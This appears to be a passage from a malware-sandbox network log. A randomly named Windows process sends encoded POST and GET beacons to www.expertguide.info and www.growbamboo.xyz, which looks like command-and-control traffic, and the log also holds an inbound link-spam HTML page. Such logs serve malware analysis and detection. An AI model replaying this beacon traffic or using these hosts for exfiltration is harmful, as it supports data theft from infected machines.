Jan 11, 2025 00:08:16.172806025 CET	1236	IN	Data Raw: 61 30 64 35 22 3e 3c 2f 76 61 72 3e 3c 61 72 65 61 20 6c 61 6e 67 3d 22 65 62 63 62 36 64 22 3e 3c 2f 61 72 65 61 3e 3c 6d 61 70 20 64 72 61 67 67 61 62 6c 65 3d 22 32 34 36 35 39 66 22 3e 3c 2f 6d 61 70 3e 3c 64 69 76 20 6c 61 6e 67 3d 22 32 34 Data Ascii: a0d5"></var><area lang="ebcb6d"></area><map draggable="24659f"></map><div lang="24bc25" id="wrap"><bdo dropzone="2d3d03"></bdo><dfn date-time="05180f"></dfn><font dir="e71200"></font><div draggable="b27e03" class="b0b50b topbarleft"><a href="/
Jan 11, 2025 00:08:16.172821999 CET	1236	IN	Data Raw: 33 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 64 61 74 65 2d 74 69 6d 65 3d 22 39 61 64 65 30 65 22 3e 3c 2f 62 64 6f 3e 3c 64 69 76 20 64 69 72 3d 22 63 35 61 65 37 34 22 20 69 64 3d 22 6e 61 76 42 6f 78 22 20 63 6c 61 73 73 3d 22 69 36 30 34 63 33 Data Ascii: 3"></map><bdo date-time="9ade0e"></bdo><div dir="c5ae74" id="navBox" class="i604c3 nwebnav"><dfn dir="0b9982"></dfn><font lang="ad5fd3"></font><ins draggable="dea5da"></ins><div lang="5b3036" class="je022d ndeallist clear_fix"><h4><a rel="nofo
Jan 11, 2025 00:08:16.172837019 CET	672	IN	Data Raw: 79 7a 2f 73 68 69 79 69 6e 6e 61 69 6c 61 6e 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e8 af 97 e9 9f b3 e4 b9 83 e5 85 b0 3c 2f 61 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 Data Ascii: yz/shiyinnailan/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/jinmeixiang/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/macangyou/" target="_blank"></a><a rel="nofollo
Jan 11, 2025 00:08:16.172851086 CET	1236	IN	Data Raw: a8 e5 bf 83 e6 98 a5 3c 2f 61 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 38 36 38 36 32 30 36 2e 78 79 7a 2f 73 68 75 69 78 69 6d 65 69 6c 69 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 Data Ascii: </a><a rel="nofollow" href="http://www.8686206.xyz/shuiximeili/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/xiaotianyou/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/ta
Jan 11, 2025 00:08:16.172866106 CET	1236	IN	Data Raw: 3e 3c 64 69 76 20 64 69 72 3d 22 64 38 33 32 39 37 22 20 63 6c 61 73 73 3d 22 6e 32 34 64 61 38 20 6e 64 65 61 6c 6c 69 73 74 20 63 6c 65 61 72 5f 66 69 78 22 3e 3c 68 34 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 Data Ascii: ><div dir="d83297" class="n24da8 ndeallist clear_fix"><h4><a rel="nofollow" href="http://www.8686206.xyz/taoguhuilixiangx/" target="_blank"></a></h4><dl><dd><a rel="nofollow" href="http://www.8686206.xyz/kuisi/" target="_blank">
Jan 11, 2025 00:08:16.172879934 CET	1236	IN	Data Raw: 73 68 61 6e 67 79 6f 75 79 61 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e4 b8 89 e4 b8 8a e6 82 a0 e4 ba 9a 3c 2f 61 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 38 36 Data Ascii: shangyouya/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/jinmeixiang/" target="_blank"></a></dd></dl></div><var dropzone="d07436"></var><area date-time="cb5040"></area><map dir="fd46ae"></map><div dr
Jan 11, 2025 00:08:16.172893047 CET	1236	IN	Data Raw: 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 38 36 38 36 32 30 36 2e 78 79 7a 2f 78 69 61 6f 64 61 6f 6e 61 6e 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 b0 8f e5 b2 9b e5 8d 97 3c 2f Data Ascii: l="nofollow" href="http://www.8686206.xyz/xiaodaonan/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/jizemingbuf/" target="_blank"></a><a rel="nofollow" href="http://www.8686206.xyz/gaoqiaoshengzi/" ta
Jan 11, 2025 00:08:16.172908068 CET	328	IN	Data Raw: 6c 3e 3c 73 75 70 20 64 72 61 67 67 61 62 6c 65 3d 22 30 35 61 35 65 33 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 65 39 63 37 64 62 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 61 74 65 2d 74 69 6d 65 3d 22 30 31 66 Data Ascii: l><sup draggable="05a5e3"></sup><time dropzone="e9c7db"></time><div date-time="01fa5d" id="nav"><ul><li><a href="/"></a></li><li><a href="http://www.8686206.xyz/xiaoxiyou/"></a></li><li><a href="http://www.8686206.xyz/shui
Jan 11, 2025 00:08:16.172923088 CET	1236	IN	Data Raw: e9 93 83 e6 9d 91 e7 88 b1 e9 87 8c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 38 36 38 36 32 30 36 2e 78 79 7a 2f 73 68 61 6e 61 6e 66 65 6e 67 68 75 61 2f 22 3e e5 b1 b1 e5 b2 b8 e9 80 a2 Data Ascii: </a></li><li><a href="http://www.8686206.xyz/shananfenghua/"></a></li><li><a href="http://www.8686206.xyz/yuantianmeiying/"></a></li><li><a href="http://www.8686206.xyz/qiaobenliang/"></a></li><li><
Jan 11, 2025 00:08:16.179786921 CET	1236	IN	Data Raw: 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 73 22 20 76 61 6c 75 65 3d 22 31 30 35 32 30 37 33 33 33 38 35 33 32 39 35 38 31 34 33 32 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 69 65 22 20 76 Data Ascii: pe="hidden" name="s" value="10520733385329581432"><input type="hidden" name="ie" value="gbk"><input type="text" name="q" class="zd8b07 searchinput" placeholder=""><input type="submit" value=" " class="af3c74 search-button"></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50006	69.57.163.64	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:21.456264019 CET	759	OUT	POST /qr23/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.expertguide.info Origin: http://www.expertguide.info Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 Cache-Control: max-age=0 Referer: http://www.expertguide.info/qr23/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 52 6b 59 30 49 31 48 4e 39 6f 39 78 4e 77 79 31 70 71 44 79 55 6d 70 72 68 71 51 58 33 42 39 68 7a 56 70 6c 43 50 33 32 2f 30 32 63 2b 52 42 6c 69 76 6d 63 58 31 78 38 53 6e 76 50 5a 53 79 2f 69 6a 41 52 57 44 30 38 4c 4c 33 69 65 71 61 74 2f 43 69 33 38 38 36 71 44 6b 71 4b 6c 66 37 56 73 67 62 58 46 43 32 70 51 6f 39 61 6e 4f 33 6e 54 48 54 61 75 38 6f 79 35 67 54 6d 41 51 44 38 42 53 57 31 6e 30 2f 47 79 50 73 62 71 56 59 6c 46 38 45 70 4e 72 52 37 72 58 58 68 49 4b 59 71 4c 46 74 41 35 65 7a 33 4e 52 67 66 30 73 37 69 44 35 38 42 7a 58 77 78 6f 55 4d 78 54 55 72 64 56 38 4a 2f 38 6f 6d 48 67 37 4e 54 Data Ascii: kPJ4bZ=RkY0I1HN9o9xNwy1pqDyUmprhqQX3B9hzVplCP32/02c+RBlivmcX1x8SnvPZSy/ijARWD08LL3ieqat/Ci3886qDkqKlf7VsgbXFC2pQo9anO3nTHTau8oy5gTmAQD8BSW1n0/GyPsbqVYlF8EpNrR7rXXhIKYqLFtA5ez3NRgf0s7iD58BzXwxoUMxTUrdV8J/8omHg7NT
Jan 11, 2025 00:08:22.034720898 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:08:21 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50007	69.57.163.64	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:24.008925915 CET	783	OUT	POST /qr23/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.expertguide.info Origin: http://www.expertguide.info Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 235 Cache-Control: max-age=0 Referer: http://www.expertguide.info/qr23/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 52 6b 59 30 49 31 48 4e 39 6f 39 78 4d 51 69 31 75 37 44 79 54 47 70 71 75 4b 51 58 35 68 39 6c 7a 56 31 6c 43 4c 50 63 2f 47 53 63 2f 30 39 6c 68 75 6d 63 51 31 78 38 4b 33 75 4c 55 79 79 30 69 6a 45 76 57 44 59 38 4c 4c 54 69 65 6f 53 74 2f 31 32 32 75 38 36 6b 4d 45 71 49 6f 2f 37 56 73 67 62 58 46 43 79 54 51 6f 6c 61 6d 2f 6e 6e 42 79 76 62 74 38 6f 31 7a 41 54 6d 45 51 44 34 42 53 58 51 6e 78 65 6a 79 4b 6f 62 71 56 6f 6c 4c 49 6f 6f 45 72 52 39 6f 6e 57 42 45 4b 6c 53 54 6a 5a 4d 36 74 62 36 5a 53 73 61 31 61 6d 34 66 4b 38 69 68 48 51 7a 6f 57 55 44 54 30 72 33 58 38 78 2f 75 2f 71 67 76 50 6f 77 73 6c 46 63 36 43 37 50 44 65 56 43 36 62 41 6a 47 45 6c 59 59 67 3d 3d Data Ascii: kPJ4bZ=RkY0I1HN9o9xMQi1u7DyTGpquKQX5h9lzV1lCLPc/GSc/09lhumcQ1x8K3uLUyy0ijEvWDY8LLTieoSt/122u86kMEqIo/7VsgbXFCyTQolam/nnByvbt8o1zATmEQD4BSXQnxejyKobqVolLIooErR9onWBEKlSTjZM6tb6ZSsa1am4fK8ihHQzoWUDT0r3X8x/u/qgvPowslFc6C7PDeVC6bAjGElYYg==
Jan 11, 2025 00:08:24.605345011 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:08:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50008	69.57.163.64	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:26.558250904 CET	1796	OUT	POST /qr23/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.expertguide.info Origin: http://www.expertguide.info Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1247 Cache-Control: max-age=0 Referer: http://www.expertguide.info/qr23/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 52 6b 59 30 49 31 48 4e 39 6f 39 78 4d 51 69 31 75 37 44 79 54 47 70 71 75 4b 51 58 35 68 39 6c 7a 56 31 6c 43 4c 50 63 2f 47 61 63 2b 47 46 6c 69 4e 65 63 52 31 78 38 55 6e 75 49 55 79 79 54 69 6e 68 6f 57 44 46 48 4c 4e 58 69 66 4b 71 74 33 67 61 32 30 73 36 6b 55 30 71 4e 6c 66 36 64 73 67 4c 4c 46 43 69 54 51 6f 6c 61 6d 38 50 6e 44 6e 54 62 68 63 6f 79 35 67 54 71 41 51 44 51 42 53 4f 74 6e 78 54 57 78 2b 63 62 72 31 34 6c 48 62 51 6f 4c 72 52 2f 68 33 57 6a 45 4b 70 4e 54 6a 73 33 36 73 75 52 5a 51 77 61 30 71 71 67 47 4c 59 45 36 78 38 6b 39 58 6b 67 61 6b 61 4a 4f 73 67 44 69 4d 6d 44 6d 75 55 77 68 7a 31 46 38 41 43 2b 47 2b 6c 38 34 64 56 68 44 51 39 53 4b 57 35 2f 6f 4e 76 79 43 6f 58 76 36 57 76 6d 37 42 41 64 77 69 33 4d 35 65 6d 72 35 35 54 63 49 6b 30 63 30 6b 34 48 59 63 37 56 43 69 69 74 67 6e 6b 50 2f 79 51 33 32 4a 38 50 4c 45 44 6e 4d 6c 4e 35 51 74 4d 63 50 68 2f 73 34 58 4b 6a 37 44 51 35 36 61 45 74 42 51 46 78 53 46 57 53 49 70 46 7a 31 55 57 43 50 54 4d [TRUNCATED] Data Ascii: kPJ4bZ=RkY0I1HN9o9xMQi1u7DyTGpquKQX5h9lzV1lCLPc/Gac+GFliNecR1x8UnuIUyyTinhoWDFHLNXifKqt3ga20s6kU0qNlf6dsgLLFCiTQolam8PnDnTbhcoy5gTqAQDQBSOtnxTWx+cbr14lHbQoLrR/h3WjEKpNTjs36suRZQwa0qqgGLYE6x8k9XkgakaJOsgDiMmDmuUwhz1F8AC+G+l84dVhDQ9SKW5/oNvyCoXv6Wvm7BAdwi3M5emr55TcIk0c0k4HYc7VCiitgnkP/yQ32J8PLEDnMlN5QtMcPh/s4XKj7DQ56aEtBQFxSFWSIpFz1UWCPTMxvytjKg2xRpZ3ZQITUaMOf8Zz56xSJmDmJwqtH2TICAKbs4RTSsHf01frKl/9cjMHjjinMMa7BC3KB8igzSTVcK1onIdWMeHmNrVmHhATQAvDwmwvTGHhnOQB4GT7RxZ+zPk11tCNrHNAe/pGpJuPN9FJ0VdRa0oRkQtwzW6Vw24uKiy2h4sGF0YaAIU3KZORII4wuoA7yFMzd9T2cVHkV2bmtqUC616tTeBskGzPWuo4rSalHerpz1k2dyxsPQRGO1xhqmzaGmqy5iyL3wK3j+wAyD7I3u9dEaDbb+xUU9WKnmfc9uPMvRgx4e8L2n2DESUwW2xNLU3Bq8025yCvJ5SVcV2mlVzibswGZrfue6rU+9x5UdnIDNXEo3IvvaOWJ1V6cnYVtkC9HVn67hqjBIfXr0WmuOdUMClIKEoXNDb4Qzd0u7rnS1Holow5xaswdR+2/HUuFzELFBS/sENVWTGrHnwHgBqrZIj8c5vI2v2d5lI0BHHj4oeephBlvaJI859Sff3YNWWLzfbFfFxzhQawHwmRhhIhsVaHovIwCOZPw9PAXRrt/DTLfJGXOZq7W13GyDQIlc31sgIqc0Wg9mjrBJMb38cYqD/cOSE54FJM2I8lHIWVHX++mGGDKDDS+Rpcw93lQ1mmk1jfXxpfewLix/HhfoGPR [TRUNCATED]
Jan 11, 2025 00:08:27.180089951 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:08:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50009	69.57.163.64	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:29.096760035 CET	500	OUT	GET /qr23/?kPJ4bZ=cmwULCeb5vBqCUjx/uOSVF44l6pPziJIygE7Dv7gwkae7g9H6YzoH0RbSyX7UnDOvFBsRzU5R5Pbc7KwiQ77stDaGRyL1NSUiRLXLX6WXOUnvs2WLQmgh9MPvCfxDS33WR2Thxo=&cHdXN=988T3LsXMJJH2nc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.expertguide.info Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Jan 11, 2025 00:08:29.676487923 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:08:29 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50010	173.208.249.155	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:35.014470100 CET	753	OUT	POST /e948/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.growbamboo.xyz Origin: http://www.growbamboo.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 Cache-Control: max-age=0 Referer: http://www.growbamboo.xyz/e948/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 44 4b 56 69 6d 4f 61 6e 57 79 57 45 4a 57 4d 54 34 78 2f 78 5a 69 59 4a 2f 67 49 5a 57 66 6d 35 52 65 47 75 4a 6f 45 6b 6b 2b 61 65 50 41 62 4b 55 6e 35 66 61 51 56 6d 79 65 52 38 69 4e 2b 6f 4a 61 73 50 62 38 77 45 5a 6f 51 76 58 49 68 34 45 2b 6b 41 78 79 79 6b 68 76 43 6f 2f 6f 44 59 57 42 63 56 30 6c 37 61 64 77 7a 6d 49 48 48 5a 70 44 6e 72 4d 68 52 50 4b 4a 37 79 53 63 4d 4f 69 65 30 38 54 72 4a 70 52 77 76 2f 6d 50 76 30 68 66 4f 69 6c 41 2f 33 42 4d 51 52 78 70 67 46 44 70 55 42 67 6e 57 72 30 54 67 6f 55 78 75 31 76 49 75 62 65 6d 7a 4b 6a 56 6f 34 34 4a 50 6c 2b 74 5a 53 39 39 50 5a 53 6c 44 72 Data Ascii: kPJ4bZ=DKVimOanWyWEJWMT4x/xZiYJ/gIZWfm5ReGuJoEkk+aePAbKUn5faQVmyeR8iN+oJasPb8wEZoQvXIh4E+kAxyykhvCo/oDYWBcV0l7adwzmIHHZpDnrMhRPKJ7yScMOie08TrJpRwv/mPv0hfOilA/3BMQRxpgFDpUBgnWr0TgoUxu1vIubemzKjVo44JPl+tZS99PZSlDr
Jan 11, 2025 00:08:35.547056913 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 10 Jan 2025 23:08:35 GMT server: LiteSpeed Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5c 76 ff bf a7 20 4e 25 99 29 b5 5b 2b 20 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 2b ed 12 5a d1 0e 53 79 a0 bc 46 9e 2c 57 d8 6e 63 da fe ba 27 95 1f b9 fe 81 ee 76 ee d9 cf f5 39 f7 b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 67 00 da 63 e0 9a ce b7 df 2e 9f 89 5b 99 60 45 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f 7b 4f 77 95 db 55 70 0f e2 2f 03 3b 30 8b d2 ad 9e ea ca bb 27 ef 3e 85 63 da 81 7b df ef 2f b2 f8 0a 50 9a dd db fd d4 a7 1b 95 c2 f4 13 f3 1f d9 c1 75 79 58 b8 e5 d5 16 e4 1d f4 d4 4c dc a7 bb 26 74 db 3c 2b aa ab 65 6d e8 54 c1 93 e3 36 a1 ed de 5f 3a 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c1 67 56 96 d5 